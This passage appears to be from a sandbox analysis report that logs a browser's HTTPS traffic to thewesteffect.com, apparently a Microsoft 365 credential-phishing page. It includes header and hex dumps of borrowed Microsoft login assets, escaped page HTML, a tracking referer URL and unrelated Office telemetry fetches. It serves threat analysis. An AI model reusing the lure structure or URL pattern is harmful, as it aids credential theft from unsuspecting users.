                                                                                                                                                                                                                                            Data Ascii: \x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC8000INData Raw: 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 73 75 62 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                                                                                                                                                                                            Data Ascii: t\x20class=\x22recaptchacheckbox\x22\x20type=\x22checkbox\x22\x20name=\x22\x22\x20id=\x22\x22>\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22recaptchasub\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            9192.168.2.44975313.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC655OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                                                                                                                                                                                            Host: aadcdn.msauth.net
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://thewesteffect.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:45 GMT
                                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                                            Content-Length: 1435
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                                                            Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                                                                                                                                            ETag: 0x8DB5C3F4911527F
                                                                                                                                                                                                                                            x-ms-request-id: 137f3aa9-001e-0073-10e3-32ec7a000000
                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120145Z-r178fb8d765bflfthC1DFWuy9n00000002ng0000000038m8
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                                                                                                                                                                                            Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h
                                                                                                                                                                                                                                            2024-11-14 12:02:47 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:47 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:47 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                                                            x-ms-request-id: 4df37937-b01e-003d-35ab-2bd32c000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120247Z-16547b76f7ftdm8dhC1DFWs13g0000000kf000000000d5nt
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:47 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            10192.168.2.44975613.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC675OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                                                                                                                                                                                                            Host: aadcdn.msauth.net
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://thewesteffect.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:45 GMT
                                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                                            Content-Length: 2407
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                                                            Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                                                                                                                                                                                            ETag: 0x8DB5C3F499A9B99
                                                                                                                                                                                                                                            x-ms-request-id: f268c127-001e-003e-7650-362396000000
                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120145Z-16547b76f7f7lhvnhC1DFWa2k00000000kg0000000007avf
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                                                                                                                                                                                                                            Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy
                                                                                                                                                                                                                                            2024-11-14 12:02:47 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:47 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                                                            x-ms-request-id: 9890a075-d01e-002b-06d2-2c25fb000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120247Z-16547b76f7ftdm8dhC1DFWs13g0000000kn00000000046g2
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            11192.168.2.449760192.254.232.133443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC671OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                            Host: thewesteffect.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123N
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC306INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:45 GMT
                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                                                                            Last-Modified: Tue, 25 Mar 2014 18:04:14 GMT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Content-Length: 2780
                                                                                                                                                                                                                                            Cache-Control: max-age=604800
                                                                                                                                                                                                                                            Expires: Thu, 21 Nov 2024 12:01:45 GMT
                                                                                                                                                                                                                                            Content-Type: image/x-icon
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC2780INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 08 00 ab 03 00 00 26 00 00 00 20 20 00 00 01 00 08 00 0b 07 00 00 d1 03 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 03 72 49 44 41 54 38 cb 65 8f 59 68 5c 65 00 85 cf ff ff 77 72 e7 de 3b fb 98 65 26 cb 74 9c 4c 9b 26 99 34 6d 69 63 52 14 34 a6 49 a9 c6 ba 14 c1 e5 49 45 b4 3e f8 24 45 b0 8a 0a d2 a7 d2 17 05 a5 a0 0f 22 14 8b 08 a2 60 51 b4 76 79 48 2a d1 34 b4 4d da 2c 36 db 4c 66 32 93 99 3b 77 bf ff f5 a5 14 97 f3 fc 9d 8f 73 88 d8 ff 0c fe 17 ce 43 72 5b f6 14 af 54 c2 ba 9a 7f 13 84 2c 33 41 02 a5 3e d8 96 0a 42 c8 3d 94 09 2d dd ff ea 7a 8e 03 31 d1 fe 7a 6c d7 f0 71 49 0f 74 db 66 e9 3e db d6 a6 41 88 4a 40 fd 9c 3b f6 3f 05 e4 bf 0b 3c d7 91 e3
                                                                                                                                                                                                                                            Data Ascii: & PNGIHDRarIDAT8eYh\ewr;e&tL&4micR4IIE>$E"`QvyH*4M,6Lf2;wsCr[T,3A>B=-z1zlqItf>AJ@;?<


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            12192.168.2.44975513.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC658OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                                                                                                                                                                                                                            Host: aadcdn.msauth.net
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://thewesteffect.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC805INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:45 GMT
                                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                                            Content-Length: 199
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                                                            Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                                                                                                                                                                                            ETag: 0x8DB5C3F49C21D98
                                                                                                                                                                                                                                            x-ms-request-id: c97bf5e1-801e-0038-538a-2c6796000000
                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120145Z-16547b76f7f76p6chC1DFWctqw0000000kn000000000ce9v
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                                                                                                                                                                                                                            Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G
                                                                                                                                                                                                                                            2024-11-14 12:02:47 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:47 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                                                            x-ms-request-id: 5b14ddc3-301e-0033-2bd2-2cfa9c000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120247Z-16547b76f7fwvr5dhC1DFW2c940000000keg00000000bxgw
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            13192.168.2.44975413.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC654OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                                                                                                                                                            Host: aadcdn.msauth.net
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
